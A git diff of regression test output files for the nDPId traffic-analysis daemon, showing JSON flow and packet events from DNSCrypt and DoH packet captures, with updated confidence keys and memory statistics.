00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739861286,"flow_last_seen":946739861286,"flow_idle_time":200000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"thread_ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01238{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":946739861286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":946739861286,"pkt":"REREREREZmZmZmZmCABFAAJc8z5AAGQR70UKAAABMw8+QZ7jAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDEDim3A5yf0wjjkn7c0KZ99+wsaC8Q0jJNdVtRyvQ4vttz57bauXWf7aWWZI9GXe13Bq\/1R6iUwT\/A0\/zRCc0Ayq9cmcu623YyCddihLAAMnrLyfM6t6rL27MiG1nzMzmCPyF28NwS5XqwjPRfHv4CZ99g0HmhnodYUO8q68IgHhgstyCXs7D74EPnDSNCXWvxBvHIE3vRmyPvunw0teioCjIqxqULRcggjd13KNSzhv65LTFQDOYbWOCn+rymPlyEaTGV8M85qpLCbZBx+P2mZMjdPflMOxEUQrHk9kdqOlL2mWcrX2tI9xOtQuzvv+NeAjtLGeixP59GGL75pvlLSdqyad1gu\/frI3Onyk042MoSYGJ6RwV3eaPNbZQCtEwb9AOFIXBmvRH9XM7npQUXePLACdz9iCTPKnV7Kw8ctrZrqQ4N6l7ZvcAG2rUT+Q9\/LXDXqKjl09ujD68NhiQh61LzaYdfK4i7pycnU4qJoDyh6wqXlEnhJrx33Uml0q43\/LZkKq6+gBtMyFx1G0t8TXOxdVJjjFCI6asgc8Kxe6G3w1FuEYOCYdPJ1BDXSvfQyl+xvLRdx79zlvjoh3CA3lgSqjekZ4r\/nVmPAWeluQHxO36OZiUmB2ai6gs8+TK+H6\/M45c1\/tfkqR+WeZABxv3Wq+MtDzkLR1Ba9KFIEFLcYA\/aPSp26qFfnJhX4KU8kKJXh\/RvHe"} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":946739861499,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":946739861499,"pkt":"ZmZmZmZmRERERERECABFAADMBL8AADQRT1YzDz5BCgAAAQG7nuMAuKxVcjZmbnZXajhA4ptwOcn9MI45J+2cfN20Dl9sTMp3rF67X\/jDpIVgb1a+3\/m31lpJBtYvfwV0B9vwzZtjNo+jG7GftQDbJaUY\/oveZ3k2CcZHOjICUKnGXvyF5yEl+85urFpytmNQcYoVHSk5XuOkfP++TbbcrYxYsDH+x2d1Xg60pF+BeHKLrLF0X3ik2Kl1hdwwJCMdJ5w1\/ra7TZUP4kyuPD6WApR9UYb+H+3yIn0="} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":200000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":200000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":200000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00591{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":608,"packets-processed":488,"total-skipped-flows":0,"total-l4-payload-len":289066,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":245,"total-detection-updates":0,"total-updates":6,"current-active-flows":0,"total-active-flows":245,"total-idle-flows":245,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":946739861499} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 608/488 @@ -1473,9 +1473,9 @@ ~~ total active/idle flows...: 245/245 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6142235 bytes -~~ total memory freed........: 6142235 bytes -~~ total allocations/frees...: 119578/119578 +~~ total memory allocated....: 6275869 bytes +~~ total memory freed........: 6275869 bytes +~~ total allocations/frees...: 122340/122340 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 228 chars ~~ json string max len.......: 2433 chars diff --git a/test/results/dnscrypt-v2-doh.pcap.out b/test/results/dnscrypt-v2-doh.pcap.out index e395b3f5f..754723853 100644 --- a/test/results/dnscrypt-v2-doh.pcap.out +++ b/test/results/dnscrypt-v2-doh.pcap.out 
@@ -2,244 +2,244 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946739298533} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7
